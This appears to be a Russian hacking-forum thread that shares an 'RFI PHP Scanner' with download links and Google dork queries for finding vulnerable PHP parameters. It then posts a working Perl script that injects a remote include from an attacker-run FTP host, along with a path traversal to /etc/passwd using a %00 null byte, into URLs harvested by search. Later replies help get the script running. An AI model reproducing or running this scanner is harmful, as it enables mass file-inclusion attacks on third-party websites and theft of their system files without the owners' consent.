http://imglab.cn/images/7Dt16625.jpg

Как пользоваться:

Заливаем скрипт на сервак и запускаем.

1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
Например : page= , pag= , q= , a= , n= и тд.
2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=

Скачать (http://secnull.ru/31/RFI_PHP_Scanner_secnull.org.rar.html):


Letitbit (http://letitbit.net/download/4d9011563398/RFI-PHP-Scanner.rar.html)
Deposit (http://depositfiles.com/files/8439011)
Rapidshare (http://rapidshare.com/files/150612134/RFI_PHP_Scanner.rar.html)
Dump (http://dump.ru/file/1098911)
Slil (http://slil.ru/26203887)


(c) secnull

писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
allinurl:".php?page="

может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
Спайдер
давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС ;)

satana8920, оказалось что не совсем то же самое, вобщем вот код


#!perl
use LWP
$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
$rshell = 'ftp://omfg0o:spyder@ftp.narod.ru/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение
$lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд
$timeout = 15;
$var = "$ARGV[0]";
open (LIST, "$list") or die $!;
open (RES, ">$res") or die $!;
while (<LIST>) {
$_=~ /$var/;
$url = "$`"."$var"."="."$rshell";
print "Now checking : $url\n";
$agent = LWP::UserAgent->new();
$agent -> timeout($timeout);
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;

if ($body =~ m/ANTICHAT/) {
print RES "$url\n";
}
$url = "$`"."$var"."="."$lshell";
print "Now checking : $url\n";
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;

if ($body =~ m/root:x:0:0/) {
print RES "$url\n";
} else {
$url = "$`"."$var"."="."$lshell".'%00';
print "Now checking : $url\n";
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;

if ($body =~ m/root:x:0:0/) {
print RES "$url\n";
}
}
}


Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
https://forum.antichat.ru/thread56927.html

работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =)

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то

тоже самое((( :mad:

код почитайте

$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата

и вообще почитайте мой пост

так как у мну лежит все в одной папке у меня это так выглЯдит:
$list = "parse.txt"; # Путь к файлу с сылками
$res = "res.txt"; # Путь к сохранению результата